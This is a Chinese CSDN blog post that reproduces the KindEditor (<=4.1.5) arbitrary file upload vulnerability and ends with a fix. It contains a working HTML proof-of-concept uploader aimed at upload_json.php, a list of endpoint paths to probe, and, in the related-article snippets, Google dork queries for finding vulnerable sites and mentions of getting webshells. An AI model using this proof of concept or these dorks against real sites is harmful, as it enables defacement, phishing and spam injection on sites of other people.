KindEditor文件上传漏洞(CVE-2018-18950)

最新推荐文章于 2025-03-14 16:19:13 发布
最新推荐文章于 2025-03-14 16:19:13 发布
阅读量3.9k 收藏 11
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135368686
版权
本文描述了KindEditor4.1.5编辑器中的文件上传漏洞,攻击者可以通过恶意HTML文件上传.txt和.html文件,进行钓鱼攻击。复现步骤包括查看版本、构造POC和使用CURL。修复建议是删除upload_json.和file_manager_json.文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述:

漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。 /php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。

复现过程:

1.访问ip;port

2.查看版本信息

/kindeditor.js

小于kindeditor4.1.5 ,证明存在文件上传漏洞

3.访问文件上传页面

4.进行尝试如下路径是否存在有必要验证文件 upload_json.*,常见判断路径如下:

​/asp/upload_json.asp?dir=file

​/asp.net/upload_json.ashx?dir=file

​/jsp/upload_json.jsp?dir=file

​/php/upload_json.php?dir=file

证明系统的语言为php

5.构造POC或者CURL提交文件。这次采用构造 POC,url替换为攻击url。

<html><head>

    <title>Uploader</title>

    <script src="http://ip:port/kindeditor.js"></script>

    <script>        KindEditor.ready(function (K) {            var uploadbutton = K.uploadbutton({                button: K('#uploadButton')[0],                fieldName: 'imgFile',                url: 'http://ip:port/php/upload_json.php?dir=file',                afterUpload: function (data) {                    if (data.error === 0) {                        var url = K.formatUrl(data.url, 'absolute');                        K('#url').val(url);                    }                },            });            uploadbutton.fileBox.change(function (e) {                uploadbutton.submit();            });        });    </script></head><body>

<div class="upload">

    <input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>

    <input type="button" id="uploadButton" value="Upload"/>

</div>

</body>

</html>

​​​​​​​6.访问html文件如下

7.抓包,上传txt文件,获取返回路径

8.访问上传文件,发现成功上传

9.同时也可以上传.html文件

这就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)

修复建议:

1.直接删除upload_json.和file_manager_json.即可

慕筱蚺
关注
CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
XZ_______的博客
04-22 1384
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中。
kindeditor上传漏洞复现(CVE-2017-1002024)
qq_34853514的博客
08-09 4087
漏洞简介 漏洞编号: CVE-2017-1002024 漏洞详情: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,在于小于等于kindeditor4.1.12 编辑器里,可以上传.txt和.html文件,支持php/asp/jsp/asp.net。 漏洞影响范围: kindeditor<=4.1.11 漏洞原理: upload_json.*中代码并没有对用户上传的文件格式,以及大小进行安全检测,导致用户可以伪造恶意文件进行上传,尤其html文件可以
kindeditor编辑器<=4.1.5上传漏洞复现
p_utao的博客
12-11 1240
前期 谷歌语法搜索 inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 首先一定要看脚本语言,对症下药 /asp/upload_json.asp /asp.net/upload_json.ashx /
kindeditor php 漏洞,KindEditor漏洞、优化以及漏洞、BUG修复方案汇总
weixin_39772651的博客
03-22 1922
Kindeditor漏洞 编辑代码内容被执行kindeditor漏洞描述:在kindeditor编辑代码添加到数据库时没有任何问题,也就是一些HTML代码不会被执行,例如:web编程,这样的代码在首次编辑的时候没有被执行。但是,从数据库里取出来再放到kindeditor里进行修改的时候问题就出现了,这行HTML代码被执行了,结果这样:web编程 变成了超链接的形式。解决办法:先看下面这张图这张图是...
记一次解析漏洞渗透经历,从零基础到精通,收藏这篇就够了!_kindeditor漏洞
最新发布
bdfcfff77fa的博客
03-14 348
看了下端口 14147 也开放,看了 FileZilla Server Interface.xml 文件我们可以看到它的连接地址:127.0.0.1 及端口:14147,密码这里为空。前面的 1234 是本机连接用的端口,中间的 ip 地址是目标服务器的(可以是 webshell 所在服务器也可以是和它同内网的服务器),后面的 14147 是欲连接目标服务器的端口。然后我去看了一下他主站是一个 asp 的站,跟这个域名同一台,然后上传了一个 asp 一句话,成功执行了命令。
KindEditor 文件上传漏洞漏洞
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持asp、aspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞,上传doc,docx,xls,xlsx,ppt,h
关于网站后台KindEditor编辑器存在安全漏洞
weixin_44203465的博客
04-02 1727
@[TO一、 漏洞基本情况 Kindeditor上的uploadbutton.html是用于文件上传功能的页面,因其upload_json.*上传功能文件允许被直接调用,从而实现上传htm,html,txt等文件到服务器,攻击者利用此漏洞可直接在上传的htm,html文件中添加跳转到违法网站的代码,实现攻击。该文件很多使用该组件的网站并没有删除也未做相关安全设置,从而导致漏洞被利用。C](这里写自...
Kindeditor上传漏洞复现(CVE-2017-1002024)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-09 3706
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境土豪专用下载链接 https://download.csdn.net/download/qin9800/18510863 1. 漏洞简述 漏洞名称:Kindeditor上传漏洞 漏洞编号:CVE-2017-1002024 漏洞影响:黑页、钓鱼、XSS等 基础权限
kindeditor编辑器文件上传漏洞
shy的博客
03-12 4122
kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。 通过扫描器发现该网站存在编辑器。 通过浏览器访问,确定该编辑器为kindeditor编辑器。 确定该编辑器的版本小于4.1.5,存在文件上传漏洞。 构造文件上传漏洞利用脚本kindeditor.html。 <html><head> <title>Uploader</title> <s
KindEditor 文件上传漏洞验证_ content kindeditor asp upload_json
2401_87204956的博客
09-19 642
Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add(“file”,“doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”)漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。
KindEditor 上传漏洞致近百个党政机关网站遭植入
weixin_33906657的博客
02-23 256
百度智能云 云生态狂欢季 热门云产品1折起>>> 2月21日消息,近日,安恒明鉴网站安全监测平台和应...
网站安全检测被 提示该网站内容被禁止访问
网站安全专家
05-11 1850
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的网站漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司网站,以及事业单位的网...
kindeditor
11-19
kindeditor_a5\kindeditor-4.1.10\kindeditor.js
文件上传漏洞(upload-labs)
m0_69119863的博客
06-18 1601
文件上传漏洞包括解析漏洞CMS漏洞编辑器漏洞CVE漏洞。1.CMS文件系统文件上传漏洞:通达OA漏洞。2.编辑器漏洞:常见编辑器有ueditor、fckeditor、ckfind、kindeditor等。3.CVE漏洞(CVE-2017-15715)Apache换行解析漏洞,在2.4.0-2.4.29版本中存在。在解析php时,.php.\x0A将被按照php后缀进行解析,导致绕过一些服务器的安全策略。4.解析漏洞:⑴IIS在解析文件时存在以下两个漏洞: ①当建立.asa、
kindeditor漏洞_【漏洞预警】KindEditor文件上传漏洞
weixin_28977123的博客
12-25 1437
KindEditor信息:KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。漏洞编号:CVE-2017-1002024漏洞描述:Web应用程序KindEditor v4.1.12及之前版本中的kindeditor/php/upload_json.php页面代码在...
Kindeditor 漏洞导致网站被植入木马文件的解决办法
05-11 1179
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使...
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6951
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
KindEditor编辑器上传修改拿shell漏洞
热门推荐
收集盒 Book box
07-11 1万+
法客论坛《team.f4ck.net》 90sec论坛《www.90sec.org》 疯子博客《http://Madman.in》 作者:relywind 影响版本: KindEditor 3.5.2~4.1 漏洞利用: 打开编辑器,将一句话改名为1.jpg 上传图片, 打开文件管理,进入“down”目录,跳至尾页,最后一个图片既是我们上传的一句话 点击改名
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值